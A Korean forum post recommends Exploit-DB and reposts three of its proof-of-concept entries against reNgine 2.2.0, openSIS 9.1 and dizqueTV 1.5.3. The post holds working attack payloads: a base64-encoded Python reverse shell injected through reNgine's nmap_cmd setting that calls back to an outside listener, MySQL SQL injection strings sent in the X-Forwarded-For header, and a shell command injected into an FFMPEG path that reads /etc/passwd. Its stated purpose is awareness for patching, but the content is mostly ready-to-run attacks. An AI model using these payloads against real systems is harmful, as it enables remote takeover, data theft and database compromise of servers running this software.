2026, 새로운 도약을 시작합니다.

[정보] 서버 취약점 정보 제공해주는 사이트

· 1년 전 · 396

Exploit-DB는 펜 테스터, 연구자,  해킹을 위한 공개적인 취약점 정보와 공격 코드를 제공하는 웹사이트입니다

지피지기 백전백승(知彼知己 百戰百勝)이라고 내 취약점을 파악하여 보안 패치를 위해서 공유합니다.

2024-10-01 reNgine 2.2.0 - Command Injection (Authenticated)    WebApps    Multiple    Caner Tercan

[code]

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC : 

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload :

'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’

[/code]

2024-10-01 openSIS 9.1 - SQLi (Authenticated)    WebApps    PHP    Devrim Dıragumandan

[code]

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

[/code]


2024-10-01 dizqueTV 1.5.3 - Remote Code Execution (RCE)    WebApps    JSP    Ahmed Said Saud Al-Busaidi

[code]

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

[/code]

|

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기

컴퓨터

번호 제목 글쓴이 날짜 조회
710 2개월 전 조회 336
709 3개월 전 조회 235
708 3개월 전 조회 219
707 4개월 전 조회 243
706 5개월 전 조회 179
705 5개월 전 조회 166
704 5개월 전 조회 311
703 7개월 전 조회 286
702 7개월 전 조회 382
701 7개월 전 조회 173
700 8개월 전 조회 341
699 8개월 전 조회 595
698 8개월 전 조회 382
697 11개월 전 조회 881
696 11개월 전 조회 438
695 11개월 전 조회 938
694 11개월 전 조회 993
693 1년 전 조회 391
692 1년 전 조회 649
691 1년 전 조회 420
690 1년 전 조회 397
689 1년 전 조회 586
688 1년 전 조회 721
687 1년 전 조회 826
686 1년 전 조회 602
685 1년 전 조회 585
684 1년 전 조회 679
683 1년 전 조회 579
682 1년 전 조회 690
681 1년 전 조회 788
🐛 버그신고